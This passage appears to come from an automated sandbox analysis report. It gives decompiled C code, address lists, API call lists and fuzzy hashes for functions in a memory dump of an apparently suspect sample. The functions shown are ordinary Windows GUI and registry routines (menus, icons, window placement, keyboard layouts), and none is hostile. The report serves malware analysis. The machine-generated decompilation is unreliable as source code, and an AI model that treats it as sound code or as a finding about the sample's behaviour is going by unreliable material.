				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x43b8e6);
					E00403E10( &_v68);
					return E00403E10( &_v12);
				}
				E00403EA8( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E0043D600(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x44dba4 + ((E0040421C( *((intOrPtr*)(_t154 + 0x30)), 0x43b904) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0044DB98 |  *0x0044DB88 |  *0x0044DB90 | 0x00000400;
							_t103 = E0043D600(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004042D0(_v12));
							} else {
								_t109 = E004042D0( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0043BB94(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E0043DBBC(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0043D1D8(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x44dbd8 + ((E0040421C( *((intOrPtr*)(_t154 + 0x30)), 0x43b904) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0044DBD0 |  *0x0044DBAC |  *0x0044DBE0 |  *0x0044DBE8;
							_v61.fState =  *0x0044DBB8 |  *0x0044DBC8 |  *0x0044DBC0;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E004042D0(_v12);
							if(E0043D600(_t154) > 0) {
								_v61.hSubMenu = E0043BB94(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x43b8f8);
						E0043ACE8( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E00404190();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x43a578; // 0x43a5c4
					_t149 = E00403264( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E0043BB94(_t154);
				goto L8;
			}





















                                  0x0043b684
                                  0x0043b68f
                                  0x0043b692
                                  0x0043b695
                                  0x0043b698
                                  0x0043b69a
                                  0x0043b69e
                                  0x0043b69f
                                  0x0043b6a4
                                  0x0043b6a7
                                  0x0043b6ae
                                  0x0043b8c1
                                  0x0043b8c3
                                  0x0043b8c6
                                  0x0043b8c9
                                  0x0043b8d1
                                  0x0043b8de
                                  0x0043b8de
                                  0x0043b6ba
                                  0x0043b6c8
                                  0x0043b6d6
                                  0x0043b6db
                                  0x0043b720
                                  0x0043b72e
                                  0x0043b87a
                                  0x0043b882
                                  0x0043b887
                                  0x0043b889
                                  0x0043b8bc
                                  0x0043b88b
                                  0x0043b88e
                                  0x0043b8a3
                                  0x0043b8a3
                                  0x00000000
                                  0x0043b889
                                  0x0043b734
                                  0x0043b73b
                                  0x0043b749
                                  0x0043b74d
                                  0x0043b764
                                  0x0043b772
                                  0x0043b772
                                  0x00000000
                                  0x0043b772
                                  0x0043b76e
                                  0x0043b770
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043b776
                                  0x0043b776
                                  0x0043b776
                                  0x0043b778
                                  0x0043b778
                                  0x0043b7c7
                                  0x0043b7ee
                                  0x0043b7f5
                                  0x0043b7fa
                                  0x0043b7ff
                                  0x0043b804
                                  0x0043b80f
                                  0x0043b81b
                                  0x0043b824
                                  0x0043b824
                                  0x0043b830
                                  0x00000000
                                  0x0043b830
                                  0x0043b74d
                                  0x0043b6dd
                                  0x0043b6e0
                                  0x0043b6e2
                                  0x0043b6fc
                                  0x0043b6fc
                                  0x0043b6ff
                                  0x0043b70b
                                  0x0043b710
                                  0x0043b71b
                                  0x00000000
                                  0x0043b71b
                                  0x0043b6e4
                                  0x0043b6e8
                                  0x00000000
                                  0x00000000
                                  0x0043b6ed
                                  0x0043b6f3
                                  0x0043b6f8
                                  0x0043b6fa
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043b6fa
                                  0x0043b6d1
                                  0x00000000

                                  APIs
                                  • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0043B830
                                  • GetVersion.KERNEL32(00000000,0043B8DF), ref: 0043B720
                                    • Part of subcall function 0043BB94: CreatePopupMenu.USER32(?,0043B89B,00000000,00000000,0043B8DF), ref: 0043BBAF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Menu$CreateInsertItemPopupVersion
                                  • String ID: ,$?
                                  • API String ID: 133695497-2308483597
                                  • Opcode ID: 5de382ec41d6dd96af3b06a8017175958c72e97cb015a3a7c48b0a28992b20ae
                                  • Instruction ID: 0c5e4b8f2f76d59b067ec3093218ee92218ec90c360ef988cb41f5e5968a588f
                                  • Opcode Fuzzy Hash: 5de382ec41d6dd96af3b06a8017175958c72e97cb015a3a7c48b0a28992b20ae
                                  • Instruction Fuzzy Hash: 0B61B234A042449BDB10EF79D8816AA7BF9FF4D304F05647AEA40E73A6D738E845C798
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041DC74, Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E0041DC74() {
				struct HINSTANCE__* _t145;
				long _t166;
				intOrPtr _t167;
				intOrPtr _t186;
				void* _t192;
				BYTE* _t193;
				BYTE* _t196;
				intOrPtr _t197;
				void* _t198;
				intOrPtr _t199;

				 *((intOrPtr*)(_t198 - 0x24)) = 0;
				 *((intOrPtr*)(_t198 - 0x20)) = E0041DAE8( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
				if(_t192 > 0) {
					_t197 = 1;
					do {
						_t167 = E0041DAE8( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E0041DAF4( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
						}
						_t197 = _t197 + 1;
						_t192 = _t192 - 1;
						_t204 = _t192;
					} while (_t192 != 0);
				}
				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
				 *((intOrPtr*)(_t198 - 0x2c)) = E004077D4(( *(_t198 - 0x40))[8], _t204);
				 *[fs:eax] = _t199;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x14))( *[fs:eax], 0x41de5b, _t198);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0xc))();
				E0041D92C( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
				 *(_t198 - 0x30) = E004077D4( *((intOrPtr*)(_t198 - 0x18)), _t204);
				_push(_t198);
				_push(0x41de38);
				_push( *[fs:eax]);
				 *[fs:eax] = _t199;
				_t193 =  *(_t198 - 0x30);
				_t196 =  &(( *(_t198 - 0x30))[_t166]);
				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
				DeleteObject( *(_t198 - 0x34));
				DeleteObject( *(_t198 - 0x38));
				_t145 =  *0x44f664; // 0x400000
				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
					E0041D09C(_t166);
				}
				_pop(_t186);
				 *[fs:eax] = _t186;
				_push(E0041DE3F);
				return E004026DC( *(_t198 - 0x30));
			}













                                  0x0041dc76
                                  0x0041dc85
                                  0x0041dc8b
                                  0x0041dc8e
                                  0x0041dc90
                                  0x0041dc95
                                  0x0041dca6
                                  0x0041dcab
                                  0x0041dcd2
                                  0x0041dcd5
                                  0x0041dcd5
                                  0x0041dcd8
                                  0x0041dcd9
                                  0x0041dcd9
                                  0x0041dcd9
                                  0x0041dc95
                                  0x0041dce7
                                  0x0041dcf3
                                  0x0041dcff
                                  0x0041dd0d
                                  0x0041dd1b
                                  0x0041dd35
                                  0x0041dd48
                                  0x0041dd57
                                  0x0041dd66
                                  0x0041dd75
                                  0x0041dd85
                                  0x0041dd94
                                  0x0041dd9c
                                  0x0041dda7
                                  0x0041ddac
                                  0x0041ddad
                                  0x0041ddb2
                                  0x0041ddb5
                                  0x0041ddb8
                                  0x0041ddbe
                                  0x0041ddc6
                                  0x0041ddd4
                                  0x0041dddd
                                  0x0041dde6
                                  0x0041de02
                                  0x0041de10
                                  0x0041de18
                                  0x0041de1a
                                  0x0041de1a
                                  0x0041de21
                                  0x0041de24
                                  0x0041de27
                                  0x0041de37

                                  APIs
                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041DD66
                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041DD75
                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041DDC6
                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041DDD4
                                  • DeleteObject.GDI32(?), ref: 0041DDDD
                                  • DeleteObject.GDI32(?), ref: 0041DDE6
                                  • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041DE08
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Object$BitmapBitsDelete$CreateIcon
                                  • String ID:
                                  • API String ID: 1030595962-0
                                  • Opcode ID: a493f37630d313a8ab3b666c3e5046268f9920936161065bfb53cc2c53949fa9
                                  • Instruction ID: 30875b8bfea210891da0a6cec79c71750fcf32235eb8013acc0712630be66db0
                                  • Opcode Fuzzy Hash: a493f37630d313a8ab3b666c3e5046268f9920936161065bfb53cc2c53949fa9
                                  • Instruction Fuzzy Hash: FA61E775E002199FCB40DFA9C881ADEBBF9FF49304B114466F805EB351D639AD91CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433938, Relevance: 10.7, APIs: 7, Instructions: 156COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00433938(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _t80;
				intOrPtr _t91;
				void* _t119;
				intOrPtr _t136;
				intOrPtr _t145;
				void* _t148;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t119 = __ecx;
				_v8 = __eax;
				_t145 =  *0x44e0ec; // 0x44fbb4
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t148);
				_push(0x433b11);
				_push( *[fs:eax]);
				 *[fs:eax] = _t148 + 0xffffffe0;
				E0042BF10(_v8, __ecx, __ecx, _t145);
				_v16 = _v16 + 4;
				E0042D100(_v8,  &_v28);
				if(E00448D7C() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E00448D7C() -  *(_v8 + 0x4c);
				}
				if(E00448D88() <  *(_v8 + 0x48) + _v28) {
					_v28 = E00448D88() -  *(_v8 + 0x48);
				}
				if(E00448D70() > _v28) {
					_v28 = E00448D70();
				}
				if(E00448D64() > _v16) {
					_v16 = E00448D64();
				}
				SetWindowPos(E004325A4(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E004040D0(_t119) < 0x64 &&  *0x44d9d0 != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E00436B8C( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x44d9d0(E004325A4(_v8), 0x64,  *0x0044DAD8 | 0x00040000);
					}
				}
				_t80 =  *0x44dfb8; // 0x44fbb0
				E0042FCD8(_v8,  *((intOrPtr*)( *_t80 + 0x30)));
				ShowWindow(E004325A4(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t136);
				 *[fs:eax] = _t136;
				_push(0x433b18);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t91 = _v8;
				 *((char*)(_t91 + 0x210)) = 0;
				return _t91;
			}
















                                  0x00433946
                                  0x00433947
                                  0x00433948
                                  0x00433949
                                  0x0043394a
                                  0x0043394c
                                  0x0043394f
                                  0x00433958
                                  0x00433961
                                  0x00433962
                                  0x00433967
                                  0x0043396a
                                  0x00433972
                                  0x00433977
                                  0x00433981
                                  0x00433998
                                  0x004339a7
                                  0x004339a7
                                  0x004339bc
                                  0x004339cb
                                  0x004339cb
                                  0x004339d8
                                  0x004339e1
                                  0x004339e1
                                  0x004339ee
                                  0x004339f7
                                  0x004339f7
                                  0x00433a1d
                                  0x00433a35
                                  0x00433a5d
                                  0x00433a66
                                  0x00433a75
                                  0x00433a7e
                                  0x00433a8c
                                  0x00433a97
                                  0x00433a97
                                  0x00433a97
                                  0x00433abb
                                  0x00433abb
                                  0x00433a66
                                  0x00433ac1
                                  0x00433ace
                                  0x00433ade
                                  0x00433ae8
                                  0x00433aed
                                  0x00433af0
                                  0x00433af3
                                  0x00433b00
                                  0x00433b06
                                  0x00433b09
                                  0x00433b10

                                  APIs
                                  • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00433B11), ref: 00433A1D
                                  • GetTickCount.KERNEL32 ref: 00433A22
                                  • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00433A5D
                                  • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00433A75
                                  • AnimateWindow.USER32(00000000,00000064,00000001), ref: 00433ABB
                                  • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00433B11), ref: 00433ADE
                                    • Part of subcall function 00436B8C: GetCursorPos.USER32(?), ref: 00436B90
                                  • GetTickCount.KERNEL32 ref: 00433AF8
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                  • String ID:
                                  • API String ID: 3024527889-0
                                  • Opcode ID: d63b6c8084175378d01836d4ecc6302de1c46b1a314d260133b736f3e127af26
                                  • Instruction ID: 3024290327c9533f4d2744711a43057b7d38c4f586b52be3a07f9c054e8ef0e4
                                  • Opcode Fuzzy Hash: d63b6c8084175378d01836d4ecc6302de1c46b1a314d260133b736f3e127af26
                                  • Instruction Fuzzy Hash: 3D516D74A00109EFDB10EFA9C986A9EB3F5EF48305F20456AF540E7395C779AE40CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00429864, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E00429864(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				char _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t78;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr* _t104;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t112;
				struct HWND__* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t117;

				_t102 = __ecx;
				_t101 = __eax;
				_v5 = 1;
				_t113 = E00429CB4(_a4 + 0xfffffff7);
				_v24 = _t113;
				_t53 = GetWindow(_t113, 4);
				_t104 =  *0x44dfb8; // 0x44fbb0
				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t114 = _t101;
					while(1) {
						_t55 =  *((intOrPtr*)(_t114 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t114 = _t55;
					}
					_t112 = E004325A4(_t114);
					_v28 = _t112;
					if(_t112 == _v24) {
						goto L25;
					}
					_t13 = _a4 - 0x10; // 0xe87d83e8
					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
					if(_t60 == 0) {
						_t19 = _a4 - 0x10; // 0xe87d83e8
						_t106 =  *0x42840c; // 0x428458
						__eflags = E00403264( *_t19, _t106);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t21 = _a4 - 0x10; // 0xe87d83e8
							_v32 = E004325A4( *_t21);
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						_push( &_v32);
						_push(E004297F8);
						_push(GetCurrentThreadId());
						L00406258();
						_t126 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E004032D4(_t101, _t126);
						_t78 =  *0x44fb30; // 0x0
						_t110 =  *0x4271ec; // 0x427238
						if(E00403264(_t78, _t110) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t84 =  *0x44fb30; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t86 =  *0x44fb30; // 0x0
						if(E004325A4( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t116 = _t60;
					while(1) {
						_t93 =  *((intOrPtr*)(_t116 + 0x30));
						if(_t93 == 0) {
							break;
						}
						_t116 = _t93;
					}
					_v32 = E004325A4(_t116);
					goto L19;
				}
				_t117 = E00428DD0(_v24, _t102);
				if(_t117 == 0) {
					goto L25;
				} else {
					while(1) {
						_t98 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t98 == 0) {
							break;
						}
						_t117 = _t98;
					}
					_v24 = E004325A4(_t117);
					goto L6;
				}
			}































                                  0x00429864
                                  0x0042986d
                                  0x0042986f
                                  0x0042987e
                                  0x00429880
                                  0x00429886
                                  0x0042988b
                                  0x00429896
                                  0x004298bf
                                  0x004298c3
                                  0x004299f2
                                  0x004299fb
                                  0x004299fb
                                  0x004298c9
                                  0x004298cf
                                  0x004298cf
                                  0x004298d4
                                  0x00000000
                                  0x00000000
                                  0x004298cd
                                  0x004298cd
                                  0x004298dd
                                  0x004298df
                                  0x004298e5
                                  0x00000000
                                  0x00000000
                                  0x004298ee
                                  0x004298f1
                                  0x004298f6
                                  0x00429917
                                  0x0042991a
                                  0x00429925
                                  0x00429927
                                  0x00429939
                                  0x0042993b
                                  0x00429929
                                  0x0042992c
                                  0x00429934
                                  0x00429934
                                  0x0042993e
                                  0x0042993e
                                  0x00429942
                                  0x00429948
                                  0x0042994e
                                  0x00429954
                                  0x00429955
                                  0x0042995f
                                  0x00429960
                                  0x00429965
                                  0x00429969
                                  0x00000000
                                  0x00000000
                                  0x00429977
                                  0x00429982
                                  0x00429987
                                  0x00429997
                                  0x0042999c
                                  0x004299a1
                                  0x004299ae
                                  0x004299d9
                                  0x004299ec
                                  0x004299ee
                                  0x004299ee
                                  0x00000000
                                  0x004299ec
                                  0x004299b0
                                  0x004299bf
                                  0x00000000
                                  0x00000000
                                  0x004299c1
                                  0x004299d7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004299d7
                                  0x004298fb
                                  0x00429901
                                  0x00429901
                                  0x00429906
                                  0x00000000
                                  0x00000000
                                  0x004298ff
                                  0x004298ff
                                  0x0042990f
                                  0x00000000
                                  0x0042990f
                                  0x004298a0
                                  0x004298a4
                                  0x00000000
                                  0x004298aa
                                  0x004298ae
                                  0x004298ae
                                  0x004298b3
                                  0x00000000
                                  0x00000000
                                  0x004298ac
                                  0x004298ac
                                  0x004298bc
                                  0x00000000
                                  0x004298bc

                                  APIs
                                    • Part of subcall function 00429CB4: WindowFromPoint.USER32(00429A8E,0044FB54,00000000,0042987E,?,-0000000C,?), ref: 00429CBA
                                    • Part of subcall function 00429CB4: GetParent.USER32(00000000), ref: 00429CD1
                                  • GetWindow.USER32(00000000,00000004), ref: 00429886
                                  • GetCurrentThreadId.KERNEL32 ref: 0042995A
                                  • 72E7AC10.USER32(00000000,004297F8,?,00000000,00000004,?,-0000000C,?), ref: 00429960
                                  • GetWindowRect.USER32 ref: 00429977
                                  • IntersectRect.USER32 ref: 004299E5
                                    • Part of subcall function 00428DD0: GetWindowThreadProcessId.USER32(00000000), ref: 00428DDD
                                    • Part of subcall function 00428DD0: GetCurrentProcessId.KERNEL32(?,?,00000000,0044AEBB,?,?,0044C944,00000001,0044B027,?,?,?,0044C944), ref: 00428DE6
                                    • Part of subcall function 00428DD0: GlobalFindAtomA.KERNEL32 ref: 00428DFB
                                    • Part of subcall function 00428DD0: GetPropA.USER32 ref: 00428E12
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
                                  • String ID: 8rB
                                  • API String ID: 2049660638-1357010674
                                  • Opcode ID: 3f896aa0e0bf821ae00e2481b9b2c1111ace0677af82a28a8c090e5af3ffad72
                                  • Instruction ID: 3b0ca3b7202829636575bd769126f3a1fc6de3f7958843d9d8925eb635a21888
                                  • Opcode Fuzzy Hash: 3f896aa0e0bf821ae00e2481b9b2c1111ace0677af82a28a8c090e5af3ffad72
                                  • Instruction Fuzzy Hash: 03519371B012149FCB10EFA9D481B9EB7E4BF09354F54416AE844EB351D738EE41CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00448FC8, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E00448FC8(intOrPtr __eax, void* __ebx, void* __fp0) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t129;

				_t129 = __fp0;
				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x449173);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x44917a);
					return E00403E10( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E004030A8(1);
					E00403E10(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E004150B4( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00436FFC( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E00408770( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x44912f);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E00404080( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E00404080(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x449136);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}





















                                  0x00448fc8
                                  0x00448fc9
                                  0x00448fcb
                                  0x00448fd4
                                  0x00448fda
                                  0x00448fdf
                                  0x00448fe0
                                  0x00448fe5
                                  0x00448fe8
                                  0x00448ff2
